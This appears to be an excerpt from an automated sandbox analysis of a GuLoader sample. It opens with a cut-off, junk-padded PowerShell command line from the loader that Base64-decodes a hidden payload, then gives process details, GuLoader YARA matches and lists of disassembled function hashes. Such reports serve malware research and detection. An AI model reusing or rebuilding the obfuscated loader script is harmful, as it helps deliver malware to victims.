For1Isoa+Turb+Lain%Teff$OverHFurcoKroprSkr,MF ioO Injn Un eChem.inteCSerio EksUFejlNHysttPush ') ;$Galvanism=$Hormone[$Fornyer];}$Grooverhead=297577;$Quadricycler=30628;Profitmagere (Tollhouse 'Gade$LangGDrosL PlaOTrolbOverABraiL ark:SkrmTR grR Kl iA oycB,edlNud,iVo tN piuI.uenuFlytM Ge inva=Inh. sejtg FraEStriTSko,- AdeC winoBindNCrantS.avEcellN .rst hav Anad$rec,hSk kJ IndeLo,wMAkvalTo dNhom,GTongSDi oL JuvETho.rUncanMondESace1Dagt1Am.e5Gunv ');Profitmagere (Tollhouse 'Saks$OvilgSa ilHeatoRevobCamea AlflRe l:UdkrTS agr AngaDilig ,ruiHolok Cole epr ScyeCa.v Popu= atc ava[PraeSMicryBor,steactfol.eS.anmDat . GenC Eleo rmmnApolvPle eLandrParat Kom]Jule: Bo :PlioF Ther DocoT,anm DukB Bija La,sG nteE ta6 Hol4plafSbesnt Halr iliMetan,aflgU.ps( Cra$UdflTselvrBug,ijag,cfremlProfiKodinHeraiDe.iuFluemPedi)Mu a ');Profitmagere (Tollhouse 'stru$BaleGMel.LAv lOSnedBRecrASla lC al:Ch ipvendEGys R ForV.efjAUn,esRoseI MarOC.unNHai Zoog= ot ka.a[.ppeSUntiygrinsIndeT,erveTe tMPris.Pe lThal.E.yndX ,anTSfa . .areDobbNUnceCdolpO PreDelimI VernSymbg er]Mun : Sin:SognA nivsHalacSpeei VeliSkat.DoveGRetfeParatUndeSTilsT ontR frsIShunNTa dGFlou(Thyr$Atebt TolrBogea Tipg B oi nhykCardEKrigrUretE Ma )I tr ');Profitmagere (Tollhouse 'Slge$ E,iG AftlTek.OFroeB lesARa,ilBank:RewiNM.rieRomiWBanaFTranoEddeUUd mnBlacDTal l BraN uppDP.tuENagerTyraSPre =Svel$ DepPBeareedulrKlapV.ruma UnmS HylITilhO SkanPro.. nrlSAnagu oncb Ps S S rtInfiRDes.IAgn.nMil.g Hyp(Shou$ SvrGR.soR D aOkreoOHengv Pere imer IsohI dhEOctoA GrndMast,Back$Und.QShelUGa,tAPileDPyaeR MadiAntec SteyKongCC ckLChareDentR Ud ).lai ');Profitmagere $Newfoundlnders;"
                                    Imagebase:0xee0000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2673637961.0000000008380000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2659683449.000000000569C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2673783211.00000000097DB000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:7
                                    Start time:09:07:16
                                    Start date:24/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff68cce0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Disassembly

                                    Reset < >

                                      Executed Functions

                                      Function 00007FFE7CEC3945 Relevance: .0, Instructions: 49COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1527832467.00007FFE7CEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CEC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffe7cec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                      • Instruction ID: 82b440ad2931308f2efa683f2d05ea433cbc8d06a6dd1e14b07242b34ee59030
                                      • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                      • Instruction Fuzzy Hash: 0C01A73115CB0C4FD744EF0CE451AB5B3E0FB85364F10066EE58AC3661D632E882CB41
                                      Function 00007FFE7D14010A Relevance: .0, Instructions: 41COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1531642095.00007FFE7D140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D140000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffe7d140000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 144df57d2fccc008a0e4181496943702ee2e3a403c5e45093b6c69fa6c83e50b
                                      • Instruction ID: d1300cf126011d3975fd88f80d46586aa307d7069c81b8a85fd36018372a921d
                                      • Opcode Fuzzy Hash: 144df57d2fccc008a0e4181496943702ee2e3a403c5e45093b6c69fa6c83e50b
                                      • Instruction Fuzzy Hash: CDF0D632D0DA994FDBA2EB6888464ADBBE1EF55220B0802BFC05DD70A2D928AC45C741
                                      Function 00007FFE7CF95D2A Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1528344736.00007FFE7CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CF90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffe7cf90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 71d00c6b54c4f905fd73dffa71a56bbc426a9575f3a1d24d5a89fb3b23af242f
                                      • Instruction ID: 6998dda1188b4efe7497131aa61dfd57324af24db0bf13ebaf688bdfc447e1f9
                                      • Opcode Fuzzy Hash: 71d00c6b54c4f905fd73dffa71a56bbc426a9575f3a1d24d5a89fb3b23af242f
                                      • Instruction Fuzzy Hash: 6EF0A732A4EA884FEB16DB6C94441ECFBA1FF59324F1802BFC05CD25B3DA291445C751
                                      Function 00007FFE7D1406D5 Relevance: .0, Instructions: 25COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1531642095.00007FFE7D140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D140000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffe7d140000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 40d630fc1875b665a6e5dff17dd812da799e7800e5461b342024801e0743415d
                                      • Instruction ID: f60edd853e3c81a9aa608311b99686ea50aaa7ff5ce7adcd2d0439908c8c5808
                                      • Opcode Fuzzy Hash: 40d630fc1875b665a6e5dff17dd812da799e7800e5461b342024801e0743415d
                                      • Instruction Fuzzy Hash: 4DE08632A0C51C4DEB44A74CA4423FCB3E1FB44321F000177D14ED3163EE6539514781
                                      Function 00007FFE7CF91924 Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1528344736.00007FFE7CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CF90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffe7cf90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bdf0ea1cee65af55a8f7bdbfab6e9df5a43a65b3539b79509ca754f2964a9f62
                                      • Instruction ID: 53dac565ec086ba71a97df04f4b0d8456cd5aebf6fc8d5125986beb421f292b5
                                      • Opcode Fuzzy Hash: bdf0ea1cee65af55a8f7bdbfab6e9df5a43a65b3539b79509ca754f2964a9f62
                                      • Instruction Fuzzy Hash: 5AD01224B488080FEBC8B23C001C37E10D3EBE8342F14417AE04EC37A7CC2AAC820359

                                      Executed Functions

                                      Function 0709B260 Relevance: 23.2, Strings: 18, Instructions: 689COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'_q$4'_q$4'_q$4'_q$4'_q$4'_q$tP_q$tP_q$$_q$$_q$$_q$$_q$$_q$$_q$$_q$$_q$$_q$$_q
                                      • API String ID: 0-925596279
                                      • Opcode ID: ad20c05de2348a86bf292d4aa739e56ed7208cfcf04a4f78089659edcac53c0d
                                      • Instruction ID: e4c508082c4905c25adbd9b06af0101103685672a5adb3160f656f1aea9f1d1c
                                      • Opcode Fuzzy Hash: ad20c05de2348a86bf292d4aa739e56ed7208cfcf04a4f78089659edcac53c0d
                                      • Instruction Fuzzy Hash: 443245F1B002069FCF648F69E5506BEBBE2AF85320F24C67AD415CB295DB31D841DBA1
                                      Function 07095C80 Relevance: 20.6, Strings: 16, Instructions: 604COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'_q$4'_q$4'_q$4'_q$4'_q$4'_q$84.l$84.l$tP_q$tP_q$$_q$$_q$$_q$$_q$$_q$$_q
                                      • API String ID: 0-4072416754
                                      • Opcode ID: 8156555f8bd45e7a306f237d1da6bbe4602db6198ed5ba91af16fc8a23b11613
                                      • Instruction ID: e77b4bb882c5f886615bc325ae0bf399101691864a71306235e55ac52671d316
                                      • Opcode Fuzzy Hash: 8156555f8bd45e7a306f237d1da6bbe4602db6198ed5ba91af16fc8a23b11613
                                      • Instruction Fuzzy Hash: 09128AB1705246DFCF658B29C85066ABBF2AF82210F18C6BBD454CF292DB36CC45D7A1
                                      Function 07099978 Relevance: 15.6, Strings: 12, Instructions: 649COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f0l$(f0l$(f0l$(f0l$4'_q$4'_q$4'_q$4'_q$4'_q$4'_q$x.!k$-!k
                                      • API String ID: 0-3508134626
                                      • Opcode ID: c86492ee1e47e1b59eb47718e6b3030d893c8a279ddcefe86f6b6dc323ffa6d7
                                      • Instruction ID: 186c4eeb8097c41433d4b59da082d5924458e1e704057daa941541cbbc65921b
                                      • Opcode Fuzzy Hash: c86492ee1e47e1b59eb47718e6b3030d893c8a279ddcefe86f6b6dc323ffa6d7
                                      • Instruction Fuzzy Hash: F6426BB4B10219DFDB14CB68C951B9EBBF2AB85304F10C2A9D909AB355CB35ED81CF91
                                      Function 070991A8 Relevance: 15.6, Strings: 12, Instructions: 575COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f0l$(f0l$(f0l$(f0l$(f0l$(f0l$(f0l$(f0l$4'_q$4'_q$tP_q$tP_q
                                      • API String ID: 0-2704131189
                                      • Opcode ID: eb3b601aa8fa48964a6cc7ea40b03572fe44a469f3b5dc6226d0bd0346b7210c
                                      • Instruction ID: ed4b7f5f32adfb6ccc523eed5ab515dfbd1fd35811a8d211c433ee4d2e9cccea
                                      • Opcode Fuzzy Hash: eb3b601aa8fa48964a6cc7ea40b03572fe44a469f3b5dc6226d0bd0346b7210c
                                      • Instruction Fuzzy Hash: 4512E4B5B20205DBDF248A68C440A6BBBF2AFC5310F14C67DD9169F298DB31EC41DBA1
                                      Function 07098188 Relevance: 14.7, Strings: 11, Instructions: 971COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f0l$(f0l$(f0l$(f0l$(f0l$(f0l$(f0l$(f0l$4'_q$4'_q$tL"k
                                      • API String ID: 0-3872880506
                                      • Opcode ID: 187e2e37aa51326f305a528fd0e9306f35f4e5d721fea3b254cce116ea1c14a7
                                      • Instruction ID: 5ed3bc887a07b2d324247d14bd952f871904cc84d92a6ba3d4ba18136540e510
                                      • Opcode Fuzzy Hash: 187e2e37aa51326f305a528fd0e9306f35f4e5d721fea3b254cce116ea1c14a7
                                      • Instruction Fuzzy Hash: 97927DB4B00214DFDB54CB18C885B9ABBF2BB85304F14C2A8D959AB355DB36ED81CF91
                                      Function 0709AC88 Relevance: 10.3, Strings: 8, Instructions: 339COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'_q$4'_q$4'_q$4'_q$4'_q$4'_q$x.!k$-!k
                                      • API String ID: 0-1947025721
                                      • Opcode ID: a4ede8de2c90a1baabcf9129ccbdaefcdffa705c78a82d0b7e8ee61f065e7ceb
                                      • Instruction ID: 17112617a13841377cbe5933038bd9a92e1a0ea9b973a457fb0a9ff4791211e3
                                      • Opcode Fuzzy Hash: a4ede8de2c90a1baabcf9129ccbdaefcdffa705c78a82d0b7e8ee61f065e7ceb
                                      • Instruction Fuzzy Hash: 35D17BF4B50209DBCB04DBA8C551B9EBBF2AB84304F20C629E9156F395CB75EC46CB91
                                      Function 0709816A Relevance: 9.5, Strings: 7, Instructions: 774COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f0l$(f0l$(f0l$(f0l$(f0l$4'_q$tL"k
                                      • API String ID: 0-2942761048
                                      • Opcode ID: 135e4f687be9d07a7bb440c6508e493e75bbac416bbe4c0347bfbdf0252e41a0
                                      • Instruction ID: 8e65dc2bfa04153f31b9ba912dd3e835677bb32f60cffcafff813386892b7da9
                                      • Opcode Fuzzy Hash: 135e4f687be9d07a7bb440c6508e493e75bbac416bbe4c0347bfbdf0252e41a0
                                      • Instruction Fuzzy Hash: 46726CB4B00214DFDB54CB18C885B9AB7F2BB85304F15C2A8D959AB391DB76ED81CF90
                                      Function 07099FF3 Relevance: 9.1, Strings: 7, Instructions: 395COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f0l$(f0l$4'_q$4'_q$x.!k$x.!k$-!k
                                      • API String ID: 0-843198841
                                      • Opcode ID: 5dd579e73b3e648479a6e7900a917d2b8ee204c0b74a06de531777241eda3976
                                      • Instruction ID: e07b921cb9f34d7ba4c261d8655356b26e6485a548dfaaa97a53bc5d307fe91c
                                      • Opcode Fuzzy Hash: 5dd579e73b3e648479a6e7900a917d2b8ee204c0b74a06de531777241eda3976
                                      • Instruction Fuzzy Hash: DBF1C0B4B002159FDB14DB68C951BAEBBF2AB84304F10C1A9E9096F395CB75ED81CF91
                                      Function 0709BB70 Relevance: 6.7, Strings: 5, Instructions: 482COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'_q$4'_q$$_q$&l$&l
                                      • API String ID: 0-3741649617
                                      • Opcode ID: 232f7b76a2a55d22308ea7a02a9cfa378132b3bb4f046cb0ccb95b20cdf59ee8
                                      • Instruction ID: c9ad9f7d8290a6c73c04a60f7cf25b14c477a5fce67209e43fa732e456cedd26
                                      • Opcode Fuzzy Hash: 232f7b76a2a55d22308ea7a02a9cfa378132b3bb4f046cb0ccb95b20cdf59ee8
                                      • Instruction Fuzzy Hash: E2F166F1B00206DFCF548B78D8516ABBBE2AF85220F14C67AD905CB295EB31CC45DBA1
                                      Function 07097D80 Relevance: 6.5, Strings: 5, Instructions: 275COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f0l$(f0l$(f0l$(f0l$x.!k
                                      • API String ID: 0-2038042325
                                      • Opcode ID: 3e274c631c95533d521a9baeffd2b64afc9265cd1c2e68b128535ae4320ca2cd
                                      • Instruction ID: 7abfd891cf0f244c33f312e20f5fe2d8e43ef0cdfeb5e970e2f310f0cfe76b37
                                      • Opcode Fuzzy Hash: 3e274c631c95533d521a9baeffd2b64afc9265cd1c2e68b128535ae4320ca2cd
                                      • Instruction Fuzzy Hash: 99A1B0B5B10205EBDB54DB68C541B6EBBF3AB89304F14C168E904AF395DB36EC81CB91
                                      Function 0709AC69 Relevance: 6.5, Strings: 5, Instructions: 270COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'_q$4'_q$4'_q$x.!k$-!k
                                      • API String ID: 0-2403752331
                                      • Opcode ID: d68dee2d89260be5aa5fbdc0930f9f71935d9cedf6a37aeac4d550bd66315a72
                                      • Instruction ID: 6de41388f5f33442145dd748a3f85579f959cdf1a555d4c0fb6fdc56ff3cfa6a
                                      • Opcode Fuzzy Hash: d68dee2d89260be5aa5fbdc0930f9f71935d9cedf6a37aeac4d550bd66315a72
                                      • Instruction Fuzzy Hash: DFB18CF4B00209DFCB14DB68C451B9EBBF2AB88314F24C229E8156F395DB75AC46CB91
                                      Function 07093608 Relevance: 5.6, Strings: 4, Instructions: 585COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'_q$4'_q$4'_q$4'_q
                                      • API String ID: 0-4157139909
                                      • Opcode ID: cab7f72b20d63d71cc6669ebb6c2b30f154b867c1543a3e9faf4c421b59cf107
                                      • Instruction ID: e9e789a09fff3c1ff085b96d1f841976939059fc3dcf62ac4d9dc4fccdee2005
                                      • Opcode Fuzzy Hash: cab7f72b20d63d71cc6669ebb6c2b30f154b867c1543a3e9faf4c421b59cf107
                                      • Instruction Fuzzy Hash: 521245F27042469FCF258B7888117ABFBE29F82210F14C6BAE555DB291DB31C941DFA1
                                      Function 0709952C Relevance: 5.3, Strings: 4, Instructions: 256COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f0l$(f0l$(f0l$(f0l
                                      • API String ID: 0-2683292625
                                      • Opcode ID: b557a9d449952e6e818118d81724f6cb9990280f2874da495405ae652997f7bc
                                      • Instruction ID: 500f359c599f831058d322b3835a7c13beb09a7f21a41bf398a2013e13912ea9
                                      • Opcode Fuzzy Hash: b557a9d449952e6e818118d81724f6cb9990280f2874da495405ae652997f7bc
                                      • Instruction Fuzzy Hash: 30A16CB4E20605EBDF20CE54C441A6AFBF2AFC5314F18862DD9566B644CB32B882DB90
                                      Function 00ECC670 Relevance: 4.3, Strings: 3, Instructions: 522COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2644420102.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Hcq$$_q$$_q
                                      • API String ID: 0-3221398524
                                      • Opcode ID: 6642de093b6277d12cc7d22e73d11490e0d2a4f7a1da588516b05a1f416444df
                                      • Instruction ID: adb4654199412accdf83f0e06447aa409ae65ceed93483f150ea8fff84461daf
                                      • Opcode Fuzzy Hash: 6642de093b6277d12cc7d22e73d11490e0d2a4f7a1da588516b05a1f416444df
                                      • Instruction Fuzzy Hash: 69222F34B042148FCB29DB34C955BAEB7B2BF89305F1584A9D40AAB351DF369D46CF81
                                      Function 07097D61 Relevance: 4.0, Strings: 3, Instructions: 257COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f0l$(f0l$x.!k
                                      • API String ID: 0-2413801313
                                      • Opcode ID: d5f7cce540b1e2fd95889646cbb606e5fb29a0449911003784afe61d55280eaf
                                      • Instruction ID: 53913bbc8515c609abaa8d4df11f7cce4985e076bd1aa73d6f719e412c56d355
                                      • Opcode Fuzzy Hash: d5f7cce540b1e2fd95889646cbb606e5fb29a0449911003784afe61d55280eaf
                                      • Instruction Fuzzy Hash: 95A1C0B5B10205EFDB54CB68C441BAEBBF2AF89304F14C169E9006F395CB36AC80DB91
                                      Function 07090A80 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $_q$$_q$$_q
                                      • API String ID: 0-2441406858
                                      • Opcode ID: abcaa3fa788a0bfb74ae90abbd1bb298d96d05d9828af800514e16724b1a09c1
                                      • Instruction ID: 1f675aba310214e68e7f963c9fb572b9f1ec9f396e6f4d34b9446735635b49e3
                                      • Opcode Fuzzy Hash: abcaa3fa788a0bfb74ae90abbd1bb298d96d05d9828af800514e16724b1a09c1
                                      • Instruction Fuzzy Hash: C64158B6B002179BCF685E69890066FFBE9AFC4314F24863AD815EB344DB31D941D7E1
                                      Function 07090F48 Relevance: 3.8, Strings: 3, Instructions: 94COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $_q$$_q$$_q
                                      • API String ID: 0-2441406858
                                      • Opcode ID: 6437d5c66f9ac56a9c4f326d9478012271372024485679be737a0bfc988f1128
                                      • Instruction ID: 38527eb63014f4edcb8b7c38223f318ff2e348cf9e7c92b0e6898384f3cc6b74
                                      • Opcode Fuzzy Hash: 6437d5c66f9ac56a9c4f326d9478012271372024485679be737a0bfc988f1128
                                      • Instruction Fuzzy Hash: DF216EB130034B67DFB4566D8850727B6DA5FC0711F30853AE915C7281ED76C541D351
                                      Function 07098D88 Relevance: 3.0, Strings: 2, Instructions: 500COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f0l$4'_q
                                      • API String ID: 0-1926906172
                                      • Opcode ID: 26c802c4f9de2feb7ad6d6ab146bb98805102f6dcc5f4d780705c6e7aab9b33b
                                      • Instruction ID: ca9095c391cfe6c8706b9bea2affe3e940431805961c93244c6f94b0a0ecb30e
                                      • Opcode Fuzzy Hash: 26c802c4f9de2feb7ad6d6ab146bb98805102f6dcc5f4d780705c6e7aab9b33b
                                      • Instruction Fuzzy Hash: 7A228FB4B10214DFDB54CB18C881B9AF7B2BB86304F14C2A9D959AB391CB76ED81CF51
                                      Function 07090A61 Relevance: 2.6, Strings: 2, Instructions: 81COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $_q$$_q
                                      • API String ID: 0-458585787
                                      • Opcode ID: d7b7161e6303ea8c50cbcdff561a6743c627bf1e2d2f02ead77b073a25857aaa
                                      • Instruction ID: 5702e2f07083a3da5e389e6423a588d7c249e9e97747b9797684a3d6c15d2c06
                                      • Opcode Fuzzy Hash: d7b7161e6303ea8c50cbcdff561a6743c627bf1e2d2f02ead77b073a25857aaa
                                      • Instruction Fuzzy Hash: 0C2106B69053579FCF159F7988406AABFF4AF46210B2A42B7DC58D7242D3309900D7F1
                                      Function 07090F2D Relevance: 2.6, Strings: 2, Instructions: 79COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $_q$$_q
                                      • API String ID: 0-458585787
                                      • Opcode ID: ea709fc59dcb07e7c2a9a7832b28fb5786e1cbb67d1e66891de040e6347c9dbb
                                      • Instruction ID: 5a4806e8d04fe4dacf16f311334a78264715af816de7141b5ec6d2bd5a4aec71
                                      • Opcode Fuzzy Hash: ea709fc59dcb07e7c2a9a7832b28fb5786e1cbb67d1e66891de040e6347c9dbb
                                      • Instruction Fuzzy Hash: CD2135B13043872BDF75063988507637FEA9F82700F2481B6E944DB692E669C985D361
                                      Function 0709BB55 Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'_q
                                      • API String ID: 0-2033115326
                                      • Opcode ID: 8fb29aa9fad0454afe6cd44ae953afda999a6c070b43363ce72e1aa1e8354309
                                      • Instruction ID: e8cef9bd21e9a900bd89c838add96a5c461fa90b4b627cfbfb520d4d616a69a3
                                      • Opcode Fuzzy Hash: 8fb29aa9fad0454afe6cd44ae953afda999a6c070b43363ce72e1aa1e8354309
                                      • Instruction Fuzzy Hash: 864126F0705206DFDF688F28D590B7E77E29F81220F1486B9D8009B295EB75CD40DB51
                                      Function 0709B0AE Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: x.!k
                                      • API String ID: 0-3957559734
